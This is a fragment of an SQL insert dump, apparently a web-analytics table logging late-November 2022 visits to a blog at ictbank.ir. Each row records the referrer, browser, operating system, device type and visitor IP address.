(25903,'2022-11-24','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','46.101.162.232','000',0,1,0),
(25904,'2022-11-24','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(25905,'2022-11-24','http://ictbank.ir/blog','Chrome','Linux','5.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(25906,'2022-11-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,2,0),
(25907,'2022-11-24','http://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(25908,'2022-11-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(25909,'2022-11-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,2,0),
(25910,'2022-11-24','http://45.92.94.221/blog','Chrome','Linux','86.0.0','desktop','Unknown','','116.26.2.226','000',0,2,0),
(25911,'2022-11-24','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','43.225.189.75','000',0,1,0),
(25912,'2022-11-24','http://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','35.88.60.85','000',0,2,0),
(25913,'2022-11-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','70.40.220.144','000',0,1,0),
(25914,'2022-11-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','209.159.158.102','000',0,2,0),
(25915,'2022-11-24','http://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','35.86.220.253','000',0,1,0),
(25916,'2022-11-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(25917,'2022-11-24','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.33.38','000',0,1,0),
(25918,'2022-11-24','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(25919,'2022-11-24','http://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','51.77.247.119','000',0,2,0),
(25920,'2022-11-24','http://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','37.225.70.138','000',0,1,0),
(25921,'2022-11-24','http://ictbank.ir/blog','Opera','Windows','64.0.0.0','desktop','Unknown','','37.225.71.50','000',0,1,0),
(25922,'2022-11-24','http://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','35.86.213.92','000',0,2,0),
(25923,'2022-11-24','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25924,'2022-11-24','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','79.137.202.73','000',0,2,0),
(25925,'2022-11-24','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.247.178.167','000',0,2,0),
(25926,'2022-11-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(25927,'2022-11-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','206.189.115.231','000',0,1,0),
(25928,'2022-11-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(25929,'2022-11-24','http://ictbank.ir/blog/index.php/tag/expdp/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.40','000',0,7,0),
(25930,'2022-11-24','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25931,'2022-11-24','http://ictbank.ir/blog','Firefox','Windows','71.0','desktop','Unknown','','83.166.244.113','000',0,1,0),
(25932,'2022-11-25','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(25933,'2022-11-25','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,3,0),
(25934,'2022-11-25','http://45.92.94.221/blog','Chrome','Linux','86.0.0','desktop','Unknown','','117.37.228.187','000',0,2,0),
(25935,'2022-11-25','http://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,5,0),
(25936,'2022-11-25','http://baidu.com/','Bing Search','Android','6.0.0','mobile:smart','Mate 9','','27.115.124.70','000',0,1,0),
(25937,'2022-11-25','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(25938,'2022-11-25','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','107.150.124.45','000',0,1,0),
(25939,'2022-11-25','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(25940,'2022-11-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.15','000',0,2,0),
(25941,'2022-11-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(25942,'2022-11-25','http://wikisonnati.com/blog','Chrome','iOS','80.0.0.0','mobile:smart','iPhone','','5.75.246.46','000',0,2,0),
(25943,'2022-11-25','https://www.google.com/','Chrome','Linux','107.0.0.0','desktop','Unknown','','94.200.42.14','000',0,1,0),
(25944,'2022-11-25','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','43.225.189.75','000',0,2,0),
(25945,'2022-11-25','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','65.21.206.44','000',0,2,0),
(25946,'2022-11-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,2,0),
(25947,'2022-11-25','http://ictbank.ir/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','5.178.2.84','000',0,2,0),
(25948,'2022-11-25','http://ictbank.ir/blog','Yandex Browser','Windows','22.0.0','desktop','Unknown','','142.112.232.192','000',0,11,0),
(25949,'2022-11-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(25950,'2022-11-25','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(25951,'2022-11-25','http://ictbank.ir/blog','Chrome','Android','90.0.0.0','mobile:smart','7 Pro','','82.102.19.110','000',0,1,0),
(25952,'2022-11-25','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','62.48.186.174','000',0,1,0),
(25953,'2022-11-25','http://ictbank.ir/blog','Chrome','Windows','34.0.0.0','desktop','Unknown','','159.65.24.22','000',0,7,0),
(25954,'2022-11-25','http://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.35','000',0,1,0),
(25955,'2022-11-25','http://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.202','000',0,1,0),
(25956,'2022-11-25','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.157.23','000',0,2,0),
(25957,'2022-11-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','180.97.238.11','000',0,13,0),
(25958,'2022-11-25','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','8.142.64.24','000',0,2,0),
(25959,'2022-11-25','http://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.91.239','000',0,1,0),
(25960,'2022-11-25','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Blade A520','','61.147.15.67','000',0,3,0),
(25961,'2022-11-25','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','123.245.24.154','000',0,1,0),
(25962,'2022-11-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','108.61.177.129','000',0,1,0),
(25963,'2022-11-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.77.62.18','000',0,1,0),
(25964,'2022-11-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.199.102','000',0,1,0),
(25965,'2022-11-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','206.189.115.231','000',0,1,0),
(25966,'2022-11-25','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','87.116.190.156','000',0,1,0),
(25967,'2022-11-26','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(25968,'2022-11-26','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.11','000',0,2,0),
(25969,'2022-11-26','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25970,'2022-11-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,2,0),
(25971,'2022-11-26','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(25972,'2022-11-26','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,12,0),
(25973,'2022-11-26','http://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(25974,'2022-11-26','http://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','128.14.224.248','000',0,3,0),
(25975,'2022-11-26','http://ictbank.ir/blog','Chrome','OS X','79.0.0.0','desktop','Macintosh','','142.93.184.238','000',0,2,0),
(25976,'2022-11-26','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.249.48','000',0,2,0),
(25977,'2022-11-26','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(25978,'2022-11-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,4,0),
(25979,'2022-11-26','http://ictbank.ir/blog','Firefox','Windows','40.0','desktop','Unknown','','76.72.172.170','000',0,1,0),
(25980,'2022-11-26','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','195.201.225.227','000',0,2,0),
(25981,'2022-11-26','http://ictbank.ir','Internet Explorer','Windows','7.0','desktop','Unknown','','109.70.100.30','000',0,1,0),
(25982,'2022-11-26','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(25983,'2022-11-26','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','59.36.163.204','000',0,2,0),
(25984,'2022-11-26','http://ictbank.ir/blog','Chrome','Android','80.0.0.0','mobile:smart','Galaxy A10e','','50.31.21.9','000',0,2,0),
(25985,'2022-11-26','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','39.101.140.2','000',0,2,0),
(25986,'2022-11-26','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','206.81.23.58','000',0,2,0),
(25987,'2022-11-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(25988,'2022-11-26','http://wikisonnati.com','Yandex Browser','Windows','15.0.0.0','desktop','Unknown','','45.72.65.155','000',0,2,0),
(25989,'2022-11-26','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.216.77.101','000',0,1,0),
(25990,'2022-11-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(25991,'2022-11-26','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25992,'2022-11-26','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','79.137.202.73','000',0,2,0),
(25993,'2022-11-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','140.82.52.24','000',0,1,0),
(25994,'2022-11-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(25995,'2022-11-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(25996,'2022-11-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(25997,'2022-11-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.66','000',0,2,0),
(25998,'2022-11-26','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(25999,'2022-11-27','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,6,0),
(26000,'2022-11-27','http://ictbank.ir/blog','Firefox','Windows','40.0','desktop','Unknown','','76.72.172.169','000',0,2,0),
(26001,'2022-11-27','http://ictbank.ir/blog','Firefox','Windows','100.0','desktop','Unknown','','195.181.246.191','000',0,4,0),
(26002,'2022-11-27','http://ictbank.ir/blog/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.50','000',0,8,0),
(26003,'2022-11-27','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26004,'2022-11-27','http://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','83.142.53.95','000',0,3,0),
(26005,'2022-11-27','http://design-arena.ir/blog','Chrome','OS X','103.0.0.0','desktop','Macintosh','','212.119.46.28','000',0,4,0),
(26006,'2022-11-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.15','000',0,2,0),
(26007,'2022-11-27','http://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','220.181.124.126','000',0,1,0),
(26008,'2022-11-27','http://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','220.181.103.114','000',0,1,0),
(26009,'2022-11-27','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.139','000',0,1,0),
(26010,'2022-11-27','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','182.61.11.53','000',0,2,0),
(26011,'2022-11-27','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(26012,'2022-11-27','http://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(26013,'2022-11-27','http://ictbank.ir/blog','Chrome','OS X','80.0.0','desktop','Macintosh','','116.202.106.213','000',0,1,0),
(26014,'2022-11-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(26015,'2022-11-27','http://ictbank.ir/blog','Firefox','Unknown','35.0','desktop','Unknown','','111.207.155.211','000',0,2,0),
(26016,'2022-11-27','http://ns10.design-arena.ir/blog','Chrome','Windows','72.0.0.0','desktop','Unknown','','36.99.136.133','000',0,1,0),
(26017,'2022-11-27','http://ns10.design-arena.ir/blog/','Chrome','Windows','72.0.0.0','desktop','Unknown','','36.99.136.130','000',0,1,0),
(26018,'2022-11-27','http://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','51.254.199.11','000',0,3,0),
(26019,'2022-11-27','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','142.112.232.192','000',0,9,0),
(26020,'2022-11-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','50.62.223.8','000',0,1,0),
(26021,'2022-11-27','http://45.92.94.221/blog','Chrome','Linux','86.0.0','desktop','Unknown','','59.57.202.44','000',0,2,0),
(26022,'2022-11-27','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','64.124.51.154','000',0,2,0),
(26023,'2022-11-27','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(26024,'2022-11-27','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.51.198','000',0,2,0),
(26025,'2022-11-27','http://www.wikisonnati.com/blog/sitemap.xml','Chrome','OS X','93.0.0','desktop','Macintosh','','117.187.173.3','000',0,6,0),
(26026,'2022-11-27','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(26027,'2022-11-27','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(26028,'2022-11-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(26029,'2022-11-27','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','57.128.37.136','000',0,4,0),
(26030,'2022-11-27','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.52','000',0,10,0),
(26031,'2022-11-27','http://wikisonnati.com','Opera','Windows','26.0.0.0','desktop','Unknown','','84.21.190.118','000',0,2,0),
(26032,'2022-11-27','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(26033,'2022-11-27','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','107.179.20.190','000',0,2,0),
(26034,'2022-11-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.210.248','000',0,1,0),
(26035,'2022-11-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(26036,'2022-11-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(26037,'2022-11-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(26038,'2022-11-27','http://ns10.design-arena.ir/blog','Chrome','Windows','72.0.0.0','desktop','Unknown','','36.99.136.139','000',0,1,0),
(26039,'2022-11-27','http://ns10.design-arena.ir/blog/','Chrome','Windows','72.0.0.0','desktop','Unknown','','36.99.136.140','000',0,1,0),
(26040,'2022-11-27','http://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.75','000',0,2,0),
(26041,'2022-11-27','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.26','000',0,5,0),
(26042,'2022-11-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(26043,'2022-11-27','http://45.92.94.221/blog/sitemap.xml','Chrome','Windows','64.0.0','desktop','Unknown','','117.187.173.4','000',0,6,0),
(26044,'2022-11-27','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.49','000',0,7,0),
(26045,'2022-11-27','http://ictbank.ir/blog','Firefox','Linux','102.0','desktop','Unknown','','83.142.52.32','000',0,1,0),
(26046,'2022-11-28','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','52.39.125.212','000',0,1,0),
(26047,'2022-11-28','http://ictbank.ir/blog','Chrome','Windows','54.0.0.0','desktop','Unknown','','54.208.156.114','000',0,2,0),
(26048,'2022-11-28','http://design-arena.ir/blog','Chrome','Linux','80.0.0.0','desktop','Unknown','','65.21.183.240','000',0,2,0),
(26049,'2022-11-28','http://wikisonnati.com/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','81.0.219.240','000',0,2,0),
(26050,'2022-11-28','http://design-arena.ir','Opera','Windows','12.0','desktop','Unknown','','45.192.134.88','000',0,2,0),
(26051,'2022-11-28','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','47.104.168.82','000',0,2,0),
(26052,'2022-11-28','http://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(26053,'2022-11-28','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(26054,'2022-11-28','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.35','000',0,1,0),
(26055,'2022-11-28','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','107.179.20.190','000',0,1,0),
(26056,'2022-11-28','https://www.bing.com/','Edge','Windows','107.0.0.0','desktop','Unknown','','109.227.150.223','000',0,3,0),
(26057,'2022-11-28','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','80.24.96.137','000',0,1,0),
(26058,'2022-11-28','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','81.93.142.130','000',0,6,0),
(26059,'2022-11-28','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.26.105','000',0,2,0),
(26060,'2022-11-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,4,0),
(26061,'2022-11-28','http://ictbank.ir','Firefox','Linux','36.0','desktop','Unknown','','185.196.0.25','000',0,1,0),
(26062,'2022-11-28','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','169.204.214.73','000',0,1,0),
(26063,'2022-11-28','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.36','000',0,3,0),
(26064,'2022-11-28','http://design-arena.ir','Firefox','Windows','44.0','desktop','Unknown','','104.227.222.191','000',0,4,0),
(26065,'2022-11-28','http://ns11.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.142','000',0,2,0),
(26066,'2022-11-28','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,3,0),
(26067,'2022-11-28','http://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','46.191.249.128','000',0,6,0),
(26068,'2022-11-28','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','99.192.228.44','000',0,3,0),
(26069,'2022-11-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(26070,'2022-11-28','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.26','000',0,2,0),
(26071,'2022-11-28','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.37','000',0,1,0),
(26072,'2022-11-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(26073,'2022-11-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(26074,'2022-11-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,2,0),
(26075,'2022-11-28','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.108.9.38','000',0,2,0),
(26076,'2022-11-28','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.45','000',0,3,0),
(26077,'2022-11-28','http://baidu.com/','Bing Search','Android','6.0.0','mobile:smart','Mate 9','','180.163.220.5','000',0,1,0),
(26078,'2022-11-28','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26079,'2022-11-28','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(26080,'2022-11-28','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','35.91.155.133','000',0,1,0),
(26081,'2022-11-28','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','212.16.69.194','000',0,4,0),
(26082,'2022-11-28','http://ictbank.ir','Firefox','Ubuntu','26.0','desktop','Unknown','','185.245.27.234','000',0,3,0),
(26083,'2022-11-29','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(26084,'2022-11-29','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','57.128.37.136','000',0,1,0),
(26085,'2022-11-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(26086,'2022-11-29','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(26087,'2022-11-29','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.31','000',0,1,0),
(26088,'2022-11-29','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(26089,'2022-11-29','http://ictbank.ir/blog','Firefox','OS X','50.0','desktop','Macintosh','','213.239.193.124','000',0,9,0),
(26090,'2022-11-29','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','147.135.129.229','000',0,1,0),
(26091,'2022-11-29','https://developer.mozilla.org/en-US/docs/Web/','Chrome','Android','107.0.0.0','tablet','Unknown','','20.173.96.164','000',0,6,0),
(26092,'2022-11-29','http://wikisonnati.com/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.189.170.101','000',0,2,0),
(26093,'2022-11-29','http://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(26094,'2022-11-29','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','142.93.48.245','000',0,3,0),
(26095,'2022-11-29','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.44','000',0,1,0),
(26096,'2022-11-29','https://www.bing.com','Chrome','OS X','36.0.0.0','desktop','Macintosh','','66.45.253.122','000',0,1,0),
(26097,'2022-11-29','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','164.132.44.97','000',0,2,0),
(26098,'2022-11-29','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.39','000',0,1,0),
(26099,'2022-11-29','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.45','000',0,4,0),
(26100,'2022-11-29','http://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(26101,'2022-11-29','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','188.166.224.48','000',0,2,0),
(26102,'2022-11-29','http://ictbank.ir/blog','Chrome','OS X','106.0.0.0','desktop','Macintosh','','161.35.222.203','000',0,1,0),
(26103,'2022-11-29','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.29','000',0,1,0),
(26104,'2022-11-29','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.218.61.166','000',0,2,0),
(26105,'2022-11-29','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.52','000',0,4,0),
(26106,'2022-11-29','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(26107,'2022-11-29','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.36','000',0,1,0),
(26108,'2022-11-29','http://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','171.13.14.84','000',0,1,0),
(26109,'2022-11-29','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','107.179.20.190','000',0,2,0),
(26110,'2022-11-29','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','140.246.136.252','000',0,2,0),
(26111,'2022-11-29','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.55','000',0,3,0),
(26112,'2022-11-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,2,0),
(26113,'2022-11-29','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','67.205.36.8','000',0,1,0),
(26114,'2022-11-29','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.57','000',0,2,0),
(26115,'2022-11-29','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','5.135.86.166','000',0,2,0),
(26116,'2022-11-29','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.28','000',0,1,0),
(26117,'2022-11-29','http://45.92.94.221:80/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','44.210.15.181','000',0,2,0),
(26118,'2022-11-29','http://mail.design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.189.184.9','000',0,2,0),
(26119,'2022-11-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(26120,'2022-11-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(26121,'2022-11-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
